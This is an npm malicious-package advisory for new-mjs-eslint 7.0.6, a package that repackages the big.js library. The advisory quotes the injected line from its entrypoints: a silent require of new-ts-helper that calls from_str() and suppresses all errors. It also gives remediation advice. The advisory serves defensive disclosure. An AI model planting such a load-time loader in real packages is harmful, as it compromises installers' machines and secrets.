VYPR

npm · Malicious package advisory

Malware

new-mjs-eslint

MAL-2026-6226

Malicious code in new-mjs-eslint (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b4ae24b182a00059424b8ea4800927bbbf662f0e6bf20264af611d37203a3f2e)
Package is published under the unrelated name 'new-mjs-eslint' but ships a verbatim copy of the big.js decimal-arithmetic library (original MikeMcl/big.js header, README, and source). Both main entrypoints, big.js and big.mjs, contain an injected line at lines 605-606: `const helper = require("new-ts-helper"); helper.from_str().then(e => e).catch(e => { });`. This fires on every require()/import of the package, loads the sibling dependency new-ts-helper, invokes its from_str() function, and silently swallows any error. The package name does not match its advertised content (eslint-shaped name, big.js content), the injected call sits mid-file rather than at a natural import location, and errors are deliberately suppressed — the entrypoint is a delivery vector for whatever code new-ts-helper ships, executed at load time on any installer that imports the package.

## Source: ghsa-malware (33c541d27ff115106c670596de30296c9f70a28b44032568aa5d91045f06e5ae)
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Compromised versions (1)

  • 7.0.6

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.